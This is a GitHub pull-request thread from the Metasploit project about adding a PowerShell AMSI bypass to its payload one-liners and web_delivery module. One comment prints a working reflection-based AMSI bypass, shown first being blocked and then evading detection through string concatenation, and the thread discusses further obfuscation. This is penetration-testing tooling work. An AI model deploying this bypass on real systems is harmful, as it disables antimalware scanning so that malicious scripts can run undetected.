### PR TITLE
Integrate PowerShell Protections Bypass

### LINKED ISSUE #11283: Integrate PowerShell Security Bypasses into web_delivery
## Feature Request

It would be nice to bypass PowerShell new protections with known, public techniques when generating PSH one-liners with Metasploit.

- https://twitter.com/mattifestation/status/735261176745988096
- https://cobbr.io/ScriptBlock-Logging-Bypass.html

### PR DESCRIPTION
**Pull request by phra**
Will fix https://github.com/rapid7/metasploit-framework/issues/11283

### CODE REVIEW

**Comment by bwatters-r7** [comment]
@phra I missed this for a bit, but I'd like to test and land this.  Can you give specific examples where our current payloads fail, but this succeeds so we can have some testing benchmarks?

**Comment by phra** [comment]
@bwatters-r7 just try any powershell payloads on an updated win 10 machine with AMSI.

**Comment by phra** [comment]
as reference: https://iwantmore.pizza/posts/amsi.html

**Comment by timwr** [comment]
Very interesting thanks @phra

**Comment by timwr** [comment]
I didn't expect the `'+'` to work so well:
```
Microsoft Windows [Version 10.0.17134.523]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\User>powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\User>
>> $Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$Ref.GetField('amsiInitFailed','NonPublic,Stati
c').SetValue($null,$true);
>>
>>
>>
At line:1 char:1
+
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

PS C:\Users\User> $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');$Ref.GetField('amsiIn'+'itFai
led','NonPublic,Static').SetValue($null,$true);
>>
>>
>>
PS C:\Users\User>
PS C:\Users\User>
```

**Comment by timwr** [comment]
Thanks @phra 
We still need to add this to webdelivery (preferably as an off-by-default option).
It would be nice to have the strings obfuscated dynamically, but this will do for now.

**Comment by phra** [comment]
> I didn't expect the `'+'` to work so well:

image

> It would be nice to have the strings obfuscated dynamically, but this will do for now.

empire includes https://github.com/danielbohannon/Invoke-Obfuscation but depends on PowerShell and that means adding it as _optional?_ dependency or embedding it directly within the project with a ~50mb overhead of stuff.

writing a simpler, similar project in ruby may be an overkill.

any idea?

**Comment by 0xVIC** [comment]
Another reference

https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/

**Comment by phra** [comment]
was `prepend_protections_bypass` option defined somewhere?

i don't see the setting available yet with `Framework Version: 5.0.19-dev`.

**Comment by timwr** [comment]
@phra apologies I didn't send a PR with that part, I think I tested with this commit: https://github.com/timwr/metasploit-framework/commit/a0d6bcd3c1a9763a31d64b822f400493bb4042fc

**Comment by phra** [comment]
oh ok, i hope it will be merged into master soon!
regarding the web delivery, it should be enough to prepend the bypass before the delivery script itself when choosing PowerShell as target.

**Comment by phra** [comment]
any update? i still cannot easily add the amsi bypass to powershell payloads.

**Comment by phra** [comment]
@timwr any update on this?

**Comment by timwr** [comment]
@phra did you test the commit I posted above? https://github.com/timwr/metasploit-framework/commit/a0d6bcd3c1a9763a31d64b822f400493bb4042fc
maybe you can send a PR to the framework repository that enables it for web_delivery?

**Comment by phra** [comment]
> maybe you can send a PR to the framework repository that enables it for web_delivery?

@timwr see https://github.com/rapid7/metasploit-framework/pull/12446

**Pull request merged**
